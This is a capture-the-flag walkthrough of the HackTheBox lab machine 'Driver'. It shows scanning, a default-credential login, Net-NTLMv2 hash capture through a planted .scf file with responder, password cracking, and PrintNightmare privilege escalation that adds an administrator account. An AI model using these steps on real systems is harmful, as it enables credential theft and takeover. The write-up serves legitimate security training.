┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.11.106
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone
Running (JUST GUESSING): Microsoft Windows 2008|Phone (87%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (87%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-01-17T07:26:10
|_ start_date: 2024-01-17T07:24:34
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.11.106
All 1000 scanned ports on 10.10.11.106 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|VoIP phone|general purpose|phone
Running: Allen-Bradley embedded, Atcom embedded, Microsoft Windows 7|8|Phone|XP|2012, Palmmicro embedded, VMware Player
OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Allen Bradley MicroLogix 1100 PLC, Atcom AT-320 VoIP phone, Microsoft Windows Embedded Standard 7, Microsoft Windows 8.1 Update 1, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, Palmmicro AR1688 VoIP module, VMware Player virtual NAT device
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.11.106
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
| date: 2024-01-17T07:34:50
|_ start_date: 2024-01-17T07:24:34
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 598.61 seconds
Enumeration: SMB Port 139/445/tcp
Without creds, I can’t connect to the share, or even list them:
┌──(kali💀kali)-[~]
└─$ rpcclient 10.10.11.106 -U ""
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
┌──(kali💀kali)-[~]
└─$ enum4linux -a 10.10.11.106
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
Enumeration: HTTP Port 80/tcp
Visiting the page returns a request for basic authentication: Firefox isn’t showing me the additional context like nmap did, but looking in Burp at the response it’s there:
When a server wants to request the browser include auth, it will return this 401, and the WWW-Authenticate header says what kind of auth (in this case “Basic”) as well as a realm, which Mozilla docs describe as:
http://10.10.11.106/
admin
admin
http://10.10.11.106/index.php
We as a part of centre of excellence, conducts various tests on multi functional printers such as testing firmware updates, drivers etc.
support@driver.htb
http://10.10.11.106/fw_up.php
Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.
┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.11.106
+ Server: Microsoft-IIS/10.0
+ /: Retrieved x-powered-by header: PHP/7.3.25.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ / - Requires Authentication for realm 'MFP Firmware Update Center. Please enter password for admin'
+ /: Default account found for 'MFP Firmware Update Center. Please enter password for admin' at (ID 'admin', PW 'admin'). Generic account discovered.. See: CWE-16
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ 8100 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-01-16 21:20:50 (GMT-5) (3071 seconds)
Shell as tony
Capture Net-NTLMv2:
The page says that what I upload will go to their file share. That implies it’s not going to the webserver necessarily, so looking for a way to upload webshell doesn’t make much sense.
A classic attack when you have write access to a file share is to drop a .scf file that references an icon file on an SMB share on an attacker-controlled host. If the folder containing the .scf file is opened with File Explorer, the .scf will inspire Explorer to connect back to get that icon file, and offer Net-NTLMv2 auth negotiation. If I control that host, and I can capture that exchange and try to crack the Net-NTLMv2 using an offline bruteforce (like hashcat). I used this technique on the Insane machine Sizzle back in 2019.
SCF files are Windows Shell Command files, and there are way more references on how to make a malicious one than legit uses. Some old Microsoft pages (that no longer exist, but are on the Wayback Machine) show how to create a Show Desktop Shortcut and a View Channels Quick Launch using SCF files. The format is:
[Shell]
Command=2
IconFile=<icon file>
[<thing you want to control>]
Command=<command>
Capture Hash:
I’ll abuse the IconFile bit, but having it point to my server over SMB, and create exodus.scf:
I’ll start responder, which will start many different kinds of server (including SMB) to listen and try to get Net-NTLMv2 challenges.
┌──(kali💀kali)-[~/Desktop]
└─$ sudo responder -I tun0
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
I’ll upload the .scf file to Driver, and very quickly there’s a hit at responder:
┌──(kali💀kali)-[~/Desktop]
└─$ john hash.txt --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
liltony (tony)
1g 0:00:00:00 DONE (2024-01-17 08:15) 25.00g/s 844800p/s 844800c/s 844800C/s !!!!!!..redlips
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Crackmapexec:
crackmapexec is a nice way to show that the creds work:
WinRM:
I’ll use Evil-WinRM to connect to WinRM (installed with sudo gem install evil-winrm):
┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.11.106 -u tony -p liltony
And grab user.txt:
*Evil-WinRM* PS C:\Users\tony\Desktop> cat user.txt
d6df5511a----------------------------------
Shell as administrator - PrintNightmare
Background:
This box was developed as part of the Intro to Printer Exploitation track on HackTheBox. Just as it was in development, PrintNightmare exploded onto the scene (I did a post about it here). Drive was left vulnerable to PrintNightmare as well.
Import Exploit:
The Invoke-Nightmare PowerShell script can be run with a low priv shell to add an admin user to the box. I’ll download the exploit with git (and rename the directory to something I’ll recognize:
Now I can upload the exploit over my WinRM session:
*Evil-WinRM* PS C:\Users\tony\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> upload /home/kali/Desktop/invoke-nightmare/CVE-2021-1675.ps1
However, trying to import the module is blocked by execution policy The simplest way to handle this is to just read it from my host as an HTTP request and pipe that into iex (or Invoke-Expression). I’ll start a Python web server on my host in the directory where the PS1 script is with python3 -m http.server 80, and the request the file:
-UseBasicParsing will allow the file to come back even if the IE engine isn’t available. Now the commandlet is in my current PowerShell session:
*Evil-WinRM* PS C:\programdata> Get-Command Invoke-Nightmare
CommandType Name Version Source
----------- ---- ------- ------
Function Invoke-Nightmare
Shell:
By default, Invoke-Nightmare adds a user adm1n with the password “P@ssw0rd”. I’ll use arguments to add my own user and password:
*Evil-WinRM* PS C:\programdata> Invoke-Nightmare -NewUser "0xdf" -NewPassword "0xdf0xdf"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user 0xdf as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
The output shows how it is writing a DLL file as a payload, and then loading it as a driver. This DLL just adds a user to the system as a local administrator. Then the script deletes the DLL. Not only is 0xdf a user on the box, but also is in the Administrators group:
*Evil-WinRM* PS C:\programdata> net user 0xdf
User name 0xdf
Full Name 0xdf
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/17/2024 1:27:35 PM
Password expires Never
Password changeable 1/17/2024 1:27:35 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
WinRM:
Connecting as the new user gives me access to the full filesystem:
┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.11.106 -u 0xdf -p 0xdf0xdf
*Evil-WinRM* PS C:\Users\0xdf\Documents> cd C:\users\administrator\desktop
*Evil-WinRM* PS C:\users\administrator\desktop> type root.txt
68bb8ed---------------------------
